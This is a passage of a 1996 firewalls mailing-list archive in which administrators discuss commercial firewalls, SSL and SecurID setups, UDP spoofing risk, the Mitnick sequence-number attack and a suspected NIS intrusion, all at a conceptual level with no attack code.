X-Mailer: PRODIGY Services Company Internet mailer [PIM 3.2-334.50]
Message-Id: <091.08356360.HFDK41A@prodigy.com>
To: firewalls@Greatcircle.com
Subject: Mergent Gauntlet?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi

I got a fax this morning from Mergent, offering to sell me their Gauntlet
Firewall??? What's a Gauntlet if it's not from TIS? Or is this the same
stuff?? Confused.
Thanks,

-John Molnar

From firewalls-owner Wed Jan 10 17:59:19 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA07059 for firewalls-outgoing; Wed, 10 Jan 1996 12:00:37 -0800 (PST)
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA07046 for ; Wed, 10 Jan 1996 12:00:19 -0800 (PST)
Received: from gmap-gw.leeds.ac.uk by relay4.UU.NET with ESMTP id QQzxyl10037; Wed, 10 Jan 1996 14:55:54 -0500 (EST)
Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.7.3/8.6.9) with SMTP id TAA16402 for ; Wed, 10 Jan 1996 19:44:41 GMT
Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id TAA05024 for ; Wed, 10 Jan 1996 19:44:44 GMT
From: Danny Cox
Date: Wed, 10 Jan 1996 19:45:06 GMT
Message-Id: <27217.9601101945@gmap.leeds.ac.uk>
X-Planation: X-Faces images can be viewed with the XFaces program
To: firewalls@greatcircle.com
Subject: Firewall design - routers and commercial kit
X-Sun-Charset: US-ASCII
X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt; Wed, 10 Jan 1996 10:30:51 -0800 (PST)
Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma003257; Wed Jan 10 13:29:37 1996
Posted-Date: Wed, 10 Jan 1996 13:29:36 -0500
From: "Bryan D. Boyle"
Message-Id: <9601101329.ZM5477@maverick.erenj.com>
Date: Wed, 10 Jan 1996 13:29:36 -0500
In-Reply-To: "Marcus J. Ranum" "Re: http-gw with authentication" (Jan 10, 12:59pm)
References: <199601101759.MAA08450@switchblade.v-one.com>
X-Phone: (908) 730-3338
X-Saying: Strange problems call for strange solutions.
X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s
X-Mailer: Z-Mail (3.2.1 10apr95)
To: firewalls@greatcircle.com
Subject: Re: http-gw with authentication
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 10 January 96, mjr abused small electrons by stating:
>
> [* how such a nightmare bodge of a protocol has been chosen
> to be the vehicle for "electronic commerce" is a subject worth
> a periodic boggle]

Nah, on a periodic scan, perhaps, it is the 1990's proof of Gresham's Law.

--
Bryan D. Boyle   | EMAIL: bdboyle@erenj.com   908-730-3338
#include         | http://www.access.digex.net/~bdboyle/index.html
"It is only the ignorant who suppose themselves omniscient."
                          --General Robert Edward Lee--

From firewalls-owner Wed Jan 10 18:02:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA06965 for firewalls-outgoing; Wed, 10 Jan 1996 11:59:22 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA06842 for ; Wed, 10 Jan 1996 11:58:37 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id CAA22996; Wed, 10 Jan 1996 02:55:15 -0800
Received: from haddock.demon.co.uk(158.152.16.191) by mycroft via smap (V1.3mjr) id sma022992; Wed Jan 10 02:54:48 1996
Received: from haddock.saa-cons.co.uk by smtpgate.saa-cons.co.uk with SMTP (5.65/1.3-eef) id AA11069; Wed, 10 Jan 96 11:00:47 GMT
Received: by haddock.saa-cons.co.uk (AIX 3.2/UCB 5.64/5.00) id AA42344; Wed, 10 Jan 1996 11:00:46 GMT
Date: Wed, 10 Jan 1996 11:00:39 +0000 (GMT)
From: Dave Roberts
To: firewalls@GreatCircle.COM
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN;
charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 10 Jan 1996, Brain21 wrote:

> Why did he not use TCPWrappers to prevent spoofing?

I didn't think that TCPWrapper was up to this. It can only do so much, which
I believe is preventing source-routed packets, by disabling the socket option
(according to the manual). If Mitnick was constructing his own IP packets
(and I'm presuming he was), then he would have inserted the source address of
the trusted host. Source routing would not have needed to be used.

Your questions of why are far too philosophical for someone like me to have
the pleasure to indulge in. :)

--
Dave Roberts, Unix Systems Administrator, SAA Consultants Ltd, Plymouth, UK.
"smap has the advantage [over bare sendmail] that it was written by someone
who is almost certifiably paranoid" - Brent Chapman, London, 19 Oct 95.

From firewalls-owner Wed Jan 10 18:04:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA06976 for firewalls-outgoing; Wed, 10 Jan 1996 11:59:31 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA06849 for ; Wed, 10 Jan 1996 11:58:39 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id BAA22424; Wed, 10 Jan 1996 01:59:12 -0800
Received: from mail1.digital.com(204.123.2.50) by mycroft via smap (V1.3mjr) id sma022421; Wed Jan 10 01:58:37 1996
Received: from ilosrv.ilo.dec.com by mail1.digital.com; (5.65 EXP 4/12/95 for V3.2/1.0/WV) id AA20125; Wed, 10 Jan 1996 01:54:30 -0800
Received: from ilofrs.ilo.dec.com by ilosrv.ilo.dec.com; (5.65/1.1.8.2/12Nov94-8.2MPM) id AA17451; Wed, 10 Jan 1996 09:53:56 GMT
Received: by fwsrtr.fws.ilo.dec.com; (5.65/1.3/10May95) id AA01653; Wed, 10 Jan 1996 09:56:47 GMT
Received: from karpov.fws.ilo.dec.com by hubba.fws.ilo.dec.com; (5.65/1.1.8.2/21Aug95-8.2MPM) id AA26262; Wed, 10 Jan 1996 09:55:12 GMT
Organization: Digital Firewall Engineering
Received: by karpov.fws.ilo.dec.com; (5.65v3.2/1.1.8.2/18Aug95-0213PM) id AA23434; Wed, 10 Jan 1996 09:53:55 GMT
From: Dermot Tynan
Message-Id: <9601100953.AA23434@karpov.fws.ilo.dec.com>
Subject: Re: smap/smapd question
To: tldb@eci-esyst.com (Tim Darnauer)
Date: Wed, 10 Jan 1996 09:53:54 +0000 (GMT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Tim Darnauer" at Jan 9, 96 04:12:06 pm
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Tim Darnauer wrote:
>
> Does anyone know how or why smap, smapd, and sendmail are doing this?
> Obviously I have a problem with my configuration but I've run out of
> ideas.

You don't provide a lot of details, but surmising, I'd say look at your MX
records as seen at the originating host, and study the "Received:" headers
to see who is getting the mail. Mail loops can often come about because the
originating host thinks machine A has the cheapest MX (outside of the
target), whereas machine A thinks machine B is cheapest, and machine B thinks
machine A is cheapest, etc.

- Der

PS: Sorry for posting to the group at large, but I don't know if Tim Darnauer
can receive mail...
:)

--
Dermot Tynan                    +353 91 754608        dtynan@ilo.dec.com
DTN: 822-4608                   Digital Equipment International BV, Galway, Ireland

From firewalls-owner Wed Jan 10 18:06:34 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA03041 for firewalls-outgoing; Wed, 10 Jan 1996 11:00:21 -0800 (PST)
Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA03029 for ; Wed, 10 Jan 1996 11:00:10 -0800 (PST)
Received: from gateway.deere.com by relay6.UU.NET with SMTP id QQzxyh03531; Wed, 10 Jan 1996 13:59:11 -0500 (EST)
Received: by gateway.deere.com; id MAA10566; Wed, 10 Jan 1996 12:59:03 -0600
Received: from deere.com(192.43.1.3) by gateway.deere.com via smap (g3.0.1) id xma010524; Wed, 10 Jan 96 12:58:56 -0600
Received: from ci.deere.com (dts.90.deere.com) by deere.dx.deere.com (4.1/SMI-4.0) id AA18670; Wed, 10 Jan 96 12:59:01 CST
Received: from dilligas.cam by ci.deere.com (4.1/SMI-4.0) id AA09343; Wed, 10 Jan 96 12:59:23 CST
Date: Wed, 10 Jan 96 12:59:23 CST
From: pf26376@ci.deere.com (Paul A. Fisher)
Message-Id: <9601101859.AA09343@ci.deere.com>
To: firewalls@greatcircle.com
Subject: Allow SSL through a firewall?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Subject: Allow SSL through a firewall?

I would like to allow access from the Internet to a WWW server that would
have access to our corporate data. Because of the security implications, I
would like that WWW server to be behind a firewall. I have tried to outline
my design below and I would appreciate any comments about possible problems
I may be opening myself up for.

                  ************                 !
   client---------* Internet *------Firewall---!---WWWserver
                  ************                 !
                                         Internal Network

The firewall would 'plug' (*not* proxy) port 443 inbound to the WWWserver.
The WWWserver would run Netscape's Commerce server and use SSL to encrypt the
entire session (non-SSL connections would be rejected). At that point we
would have an encrypted session between the client and server that can pass
whatever is necessary for the application (including userid's and
passwords?).

The purpose of 'plugging' port 443 through the firewall is the WWWserver
would be behind the firewall and thus not be subject to attack using other
services (telnet, sendmail, etc.). The http server would have to be secured
against outside attack, but not the entire machine. Also, this allows the
applications running on the WWWserver to have access to all of the internal
data servers without having to find their way through the firewall.

There are still some questions that we need to answer from an application
standpoint: Is SSL encryption 'strong' enough for our purposes? Does the
'magic cookie' in the client present a problem? But from a network security
standpoint, we shouldn't have a problem.

Does anyone see any other problems with this proposed configuration?

TIA,
Paul

Paul A. Fisher                         paulf@ci.deere.com
Deere & Company, W3LSW                 ...uunet!deere!paulf
John Deere Road                        (309) 765-4547
Moline, Illinois 61265                 (309) 765-5242 FAX

From firewalls-owner Wed Jan 10 18:08:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA06848 for firewalls-outgoing; Wed, 10 Jan 1996 11:58:40 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA06623 for ; Wed, 10 Jan 1996 11:58:01 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id BAA21987; Wed, 10 Jan 1996 01:11:07 -0800
Received: from relay.iunet.it(192.106.1.2) by mycroft via smap (V1.3mjr) id sma021983; Wed Jan 10 01:10:09 1996
Received: from etf.UUCP by relay.iunet.it with UUCP id AA02550 (5.65c8/IDA-1.4.4 for firewalls@greatcircle.com); Wed, 10 Jan 1996 09:56:34 +0100
Received: from cc:Mail by etf.etf.it id AA821296054 Wed, 10 Jan 96 09:47:34
Date: Wed, 10 Jan 96 09:47:34
From: "RDA"
Message-Id: <9600108212.AA821296054@etf.etf.it>
To: firewalls@greatcircle.com
Subject: RE: firewalls reviews/comparisons
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

______________________________ Forward Header __________________________________
Subject: RE: firewalls reviews/comparisons
Author:  Neil at INTERNET
Date:    1/9/96 3:41 PM

>> 2) I've been searching for information on the best firewall to purchase for
>> our needs and have not come across any reviews/comparisons on which is
>> best (I have a list of all of the firewalls available and their descriptions
>> but not any comparisons). Anyone know of any reviews and where to find
>> them? We require a firewall which could support a very high throughput so
>> we would probably require a hardware-based firewall. Configuring our
>> front-end router to act as a firewall isn't a practical option. Any
>> information would be appreciated. Thanks,
>
>There was a review of commercial firewalls in (I think) Byte or something
>like that a little while ago, the machines being the TIS Gauntlet, Border
>Ware and Firewall 1. Perhaps someone with a better memory than me can
>clarify.
>
>> Brian Hescock
>> hescockb@86aw4.ramstein.af.mil

Hello, just for info, the Byte issue mentioned is from April '95 under the
'Network security' section. As a newbie myself, I found it quite useful.

I'm hoping to set up a firewall based on NT 3.51 which will also act as a WWW
proxy. Does anyone have any inside info on the expected
release/functionalities of the Microsoft Catapult package ?

Since most of the clients on the net I need to protect are running IPX (some
run both IPX and TCP/IP), I would like to know the opinion of the experts on
the possibility of a Web proxy machine also doing a 'protocol conversion'.
i.e. surely it's theoretically possible for the WWW clients on the protected
net to connect to the proxy over IPX (or Netbeui) and for the proxy to go out
of a second card on TCP/IP to the Internet ??? I would imagine that blocking
all TCP/IP through the firewall in this way would go a long way to protecting
sensitive UNIX hosts on the inside.

Has this been done before ? Am I seriously misguided ?

Thanks for any opinions.

Richard Anstey.

=============================================================================
========  E-mail messages from the European Training Foundation      =========
========  shall not in any way be legally binding.                   =========
=============================================================================

From firewalls-owner Wed Jan 10 18:15:09 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA05198 for firewalls-outgoing; Wed, 10 Jan 1996 11:31:42 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA04912 for ; Wed, 10 Jan 1996 11:29:55 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id DAA23326; Wed, 10 Jan 1996 03:56:20 -0800
Message-Id: <199601101156.DAA23326@mycroft.GreatCircle.COM>
Received: from kuma.ciens.ucv.ve(150.185.72.83) by mycroft via smap (V1.3mjr) id sma023320; Wed Jan 10 03:55:33 1996
Received: by kuma.ciens.ucv.ve (1.37.109.4/16.2) id AA03885; Wed, 10 Jan 96 07:56:27 -0430
From: Carolina Elortegui
Subject: SunOS, NIS and some intruder
To: Firewalls@GreatCircle.COM
Date: Wed, 10 Jan 96 7:56:26 SAT
Mailer: Elm [revision: 70.85]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I just want some help understanding something that happened here on Friday.

I'm the sysadmin in a lab with 4 HPs and 2 Suns. I have worked a lot with
the HPs, but almost never with the Suns, because there was another person
who did it. This person left the lab, and now I have to learn about SunOS
and BSD-like UNIX.

There is a NIS server, let's call it "A", and there is a NIS client, let's
call it "B".
On Thursday I deleted a user from both systems, because we don't want him to
access our net. On Friday I found that the "user" I deleted the day before
had accessed "B", and he has no login in /etc/passwd, /etc/group, etc.

I was looking with the last command at what had happened, and I saw that the
user accessed machine "B" plenty of times that day.

I am really new to sysadmin labors on the Sun machines; I really know HP-UX.
Maybe there is something I don't know about happening with the NIS service
and something about the Yellow Pages service.

I have to tell you that the person who was here before me just left the Suns
as they were. I don't know what they did there; I am finding it out right
now.

Thanks for helping me

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Carolina Elortegui                 Laboratorio de Postgrado
Universidad Central de Venezuela   Administrador
Facultad de Ciencias               Escuela de Computacion
E-mail: celort@kuma.ciens.ucv.ve
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From firewalls-owner Wed Jan 10 18:44:47 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA18482 for firewalls-outgoing; Wed, 10 Jan 1996 18:23:35 -0800 (PST)
Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA18477 for ; Wed, 10 Jan 1996 18:23:31 -0800 (PST)
Date: Wed, 10 Jan 1996 21:22:28 -0500 (EST)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <960110212228.20200c26@hobbes.orl.mmc.com>
Subject: re: Encryption export lawz from US
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Al rites:

>I'm looking for some information on the current US restrictions on
>Import/Export of encrypted data, using something like PGP. If anyone has any
>pointers towards some sources, it would be tremendously helpful.

Since the import/export of encrypted data/messages have no US restrictions, I
doubt that you will find any. ITAR (International Trade in Arms Regulation)
covers cryptographic devices and analysis tools e.g. what you need to
*create* or break a cryptographic message (as I read it a decrypt-only engine
is not covered - your mileage may vary).

Warmly,
Padgett

From firewalls-owner Wed Jan 10 18:49:38 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA18511 for firewalls-outgoing; Wed, 10 Jan 1996 18:24:35 -0800 (PST)
Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA18506 for ; Wed, 10 Jan 1996 18:24:31 -0800 (PST)
Received: from pferguso-pc.cisco.com (c2robo13.cisco.com [171.68.13.39]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id SAA29907; Wed, 10 Jan 1996 18:22:56 -0800
Message-Id: <199601110222.SAA29907@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 10 Jan 1996 21:23:26 -0500
To: "Alan C.Horn"
From: Paul Ferguson
Subject: Re: Encryption export laws from US..
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You may want to redirect this request to the cypherpunks mailing list
instead, where you have a more on-topic audience.

- paul

At 05:02 PM 1/10/96 -0800, Alan C.Horn wrote:
>
>I know this is slightly off topic for this list, but I thought maybe somebody
>would know. Apologies in advance to anyone who didn't want to read this.
>
>I'm looking for some information on the current US restrictions on
>Import/Export of encrypted data, using something like PGP. If anyone has any
>pointers towards some sources, it would be tremendously helpful.
>
>Many thanks for your time.
>
>Al
>
>
>
>--
>"It's fifteen hundred miles to Ankh-Morpork" he said.
"We've got three hundred
>and sixty three elephants, fifty carts of forage, the monsoon's about to break
>and we're wearing ... we're wearing ... sort of things, like glass, only dark...
>dark glass things on our eyes..."
>                              - Terry Pratchett "Moving Pictures".
>
>Alan Horn - Computer Support and Sysadmin - Dreamworks SKG. (+1 818 733 6000)
>    [Personal Email : deorth@mono.org]  [Work Email : ahorn@dreamworks.com]
>

--
Paul Ferguson                           ||        ||
Consulting Engineering                  ||        ||
Reston, Virginia  USA                  ||||      ||||
tel: +1.703.716.9538               ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com         c i s c o  S y s t e m s

From firewalls-owner Wed Jan 10 19:06:59 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA17914 for firewalls-outgoing; Wed, 10 Jan 1996 18:09:29 -0800 (PST)
Received: from stilton.cisco.com (stilton.cisco.com [171.69.1.161]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA17857 for ; Wed, 10 Jan 1996 18:09:03 -0800 (PST)
Received: from cisco.com (localhost.cisco.com [127.0.0.1]) by stilton.cisco.com (8.6.8+c/8.6.5) with ESMTP id SAA13168; Wed, 10 Jan 1996 18:07:36 -0800
Message-Id: <199601110207.SAA13168@stilton.cisco.com>
To: nicholscs@agedwards.com (Nichols,Christopher)
Cc: firewalls@GreatCircle.COM
Subject: Re: SecureID
In-Reply-To: Your message of "Wed, 10 Jan 1996 08:00:29 CST." <1996Jan10.075400.1093.22480@igate.agedwards.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Id: <13165.821326055.1@cisco.com>
Date: Wed, 10 Jan 1996 18:07:36 -0800
From: David Carrel
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

If the cisco is the authentication point, then you will need to use TACACS
or TACACS+ to utilize the SecureID token card. Then run the TACACS or
TACACS+ server on box D. Alternatively you could run the TACACS or TACACS+
server on B and run the SDI protocol from there to D. Definitely TACACS+ is
preferred since it is encrypted and supports the resynchronization that the
SecureID cards need every now and then.

I'd venture that placing the server on B is less secure, but that's hard to
say for sure without a clear picture of your topology.

Dave

> I am investigating the use of Security Dynamics ACE Servers and SecurID
> tokens and have a question concerning packet filtering and the passing of
> the SDI packets through our net.
>
> Given the design:
>
> A (Cisco)-----External Segment-----B(HP Box)----------C(Cisco)----------D(Internal Net)
>
> A - external router and authentication point
> B - HP Box where App for users on external segment resides (routing is off)
> C - Screening Filter/Firewall
> D - Internal Net where ACE Server would reside
>
> Since the design may exist in multiple sites, we plan to use strong filtering
> between the HP box (B) and the Internal Net (D). We are also considering a
> commercial firewall at C. My understanding is that the SDI authentication
> process uses dynamically assigned port numbers (udp) > 1024. That would
> require us to open all ports > 1024 at point C so that SDI could pass from A
> to D. This is not desirable.
>
> 1) With routing off at B does anyone know of an existing proxy to pass the
> SDI packets across from A to C? or has anyone written one?
> 2) How can we setup an effective firewall at C without having to open all
> ports > 1024 and still allow the SDI authentication process to pass?
>
> One suggestion was to use TACACS. Any thoughts?
>
> Chris
>
>
>
>

From firewalls-owner Wed Jan 10 19:29:36 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA19166 for firewalls-outgoing; Wed, 10 Jan 1996 18:36:48 -0800 (PST)
Received: from switchblade.v-one.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA19144 for ; Wed, 10 Jan 1996 18:36:40 -0800 (PST)
Received: (from mjr@localhost) by switchblade.v-one.com (8.6.9/8.6.9) id VAA09986 for Firewalls@GreatCircle.COM; Wed, 10 Jan 1996 21:36:06 -0500
From: "Marcus J. Ranum"
Message-Id: <199601110236.VAA09986@switchblade.v-one.com>
Subject: Re: Firewalls-Digest V5 #14
To: Firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 21:36:05 -0500 (EST)
In-Reply-To: <199601110004.QAA14210@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 10, 96 04:04:10 pm
Reply-To: mjr@switchblade.v-one.com
Organization: V-One Corporation, Baltimore, MD
Office URL: Mjr's page
Phone: 410-889-8569
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Steven K. Sharp writes:
>Please forgive me if this is a stupid question, but why is UDP such a bad
>thing? Especially things like RealAudio, this uses UDP to communicate (as
>do many other programs). What security risk does UDP pose?

UDP in itself isn't a lot of a security risk. Indeed, you can trivially
build highly secure protocols that run atop of UDP. The problem is that
most writers of UDP-based protocols don't. :) Of course, the same may be
said of writers of TCP-based protocols. :(

The whole "UDP is evil" thing came about because it's a whole lot easier
to spoof UDP traffic than it is TCP traffic. The thing that a lot of
people (myself included!) didn't take into account was that "a whole lot
harder" doesn't mean much when you're dealing with an attacker who has
time on his hands.

The TCP protocol is stateful - packets arrive neatly checksummed and
sequenced (or at least with sequencing information) and only start to
flow back and forth after a virtual connection negotiation protocol is
successfully completed. UDP datagrams are simply spat at the recipient
who has the choice of accepting them or not. To spoof a UDP packet
probably takes 40 lines of C code. To spoof a TCP session probably takes
200, and a couple of systems in the right place, and a misconfigured
router. So, a lot of security dweebs (myself included!) deal with UDP by
putting a bullet through it, and kicking some sand over the corpse.

To make matters worse a lot of UDP applications (most notably Sun RPC,
and RealAudio) run on arbitrary ports, which makes them even harder to
sensibly track. A lot of folks are comfortable letting UDP port 53 (DNS)
into their firewalls. DNS is pretty well-known and well-behaved. Not so
RPC.

So - it's not that UDP is bad. It's more accurate to say that most of the
UDP applications are bad, and we tend to tar the protocol with the same
brush. An authenticated UDP-based datagram service would be a fine thing
I'd have no problem letting through a firewall.

RealAudio, to take (or make) an example, is one of those naughty UDP apps.
It assumes that it can talk to arbitrary machines in your network on any
of an arbitrary set of ports. Or it won't work. Brilliant design. The way
to let it through the firewall is to open a hole for those port ranges.
What happens to your network if there is some other service on those
ports is your problem, not RealAudio's. :(

My feeling, after wrestling with all these mis-designed protocols, is
"bad protocols: just say 'no'"

...and then there's the Web.

mjr.
---- Chief Scientist, V-ONE Corporation work http://www.v-one.com personal http://www.clark.net/pub/mjr/mjr-top.html From firewalls-owner Wed Jan 10 19:39:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA19154 for firewalls-outgoing; Wed, 10 Jan 1996 18:36:45 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA19141 for ; Wed, 10 Jan 1996 18:36:38 -0800 (PST) Received: from pm1-30.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA03286; Wed, 10 Jan 96 21:35:39 -0500 Date: Wed, 10 Jan 96 21:35:39 -0500 Message-Id: <9601110235.AA03286@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From the desk of Scott Rickard: >Date: Tuesday, January 09, 1996 9:56PM >Brain21 writes: > >>I would like to know this... if Shimomura is so good (an I actually >>believe that he may be) then why did he leave the r-utils enabled? Why >>did he not use TCPWrappers to prevent spoofing? Why did he allow people >>to see inside his network (Mitnick saw that there was a machine >>"X-something" that he believed was trusted by Shimomura's machine)? >Snip >>Just wondering why... > >The answer is quite clear if you have spook world experience and > identify with several key elements quoted in Frank Willoughby's > re-post of the Cypherpunks mailing list message regarding extracts > from Jonathan Littman's book "The Fugitive Game: Online With Kevin Mitnick," > >Scott Rickard >Senior IT Engineering Consultant >Scott_Rickard@mc.xerox.com Sorry, but I'm not much for conspiracy theories (unless we're talking about corporate politics). 
8^) Personally, I think there is an easier explanation without having to reach for a conspiracy theory. I could take a couple of guesses what went wrong, but they would hold no more water than any other theories. In defense of Shimomura (who isn't here to defend himself), I'll stick to what I've heard that it wasn't anything he had any choice over. There are three advantages to this: 1) It gives Tsutomu Shimomura the benefit of a doubt. (Since we don't have all of the facts, I think he deserves the benefit of a doubt). 2) It provides a ready explanation for a person of his caliber having his system compromised. 3) It happens in real life - frequently. I've seen situations in many companies where a manager who was essentially clueless about security ordered the security person to lower their guard for a special high- priority project (are there really any other kind?) which had a (wildly) unrealistic deadline - usually as a result of poor planning. Sometimes you get lucky, sometimes you don't. Shimomura didn't. FWIW, a frequent scenario that plagues many Information Security Officers is when Project Managers plan everything down to the nth detail and somehow don't think of Information Security until they are ready to go live or the deadline is only a few days away (and then only when you gently remind them). (By then, it is usually too late to do anything except get extremely creative in your ability to design work-arounds & pull rabbits out of the hat & saving the day at the last minute.) At this point, it depends on how quickly the Information Security Officer can educate the Project Manager (or a couple of his higher-up managers) about the security risks of what is about to transpire and the probable risk to the Corporation (measured in dollars, manpower, equipment, etc.). 
Having said this, the Information Security Officer will then cross his fingers for luck, say a little prayer, and hope that the Corporate powers-to-be see the wisdom of his logic and won't allow the proposed security risk to happen. If things go well, the risk doesn't happen. If it does, then life suddenly gets very interesting and you have Carte Blanche for all the overtime you could ever dream of. 8^) As for me, I suspect the above scenario is more likely than a conspiracy theory. However, since none of us has access to the facts & Shimomura isn't here to clear the air, your theories are just as valid as mine. Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From firewalls-owner Wed Jan 10 19:43:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA20030 for firewalls-outgoing; Wed, 10 Jan 1996 18:58:23 -0800 (PST) Received: from us.checkpoint.com (us.checkpoint.com [206.86.35.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA20023 for ; Wed, 10 Jan 1996 18:58:19 -0800 (PST) Received: from gil.us.checkpoint.com (latte) by us.checkpoint.com (5.x/SMI-SVR4) id AA15069; Wed, 10 Jan 1996 18:58:08 -0800 Date: Wed, 10 Jan 1996 18:58:08 -0800 Message-Id: <9601110258.AA15069@ us.checkpoint.com> X-Sender: emily@us.checkpoint.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: Emily Cohen Subject: Re: SSL and S-HTTP Proxy support Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Bill Husler >Date: Fri, 5 Jan 1996 20:46:16 -0800 >Subject: Re: SSL and S-HTTP Proxy support > >>From: Brian W. 
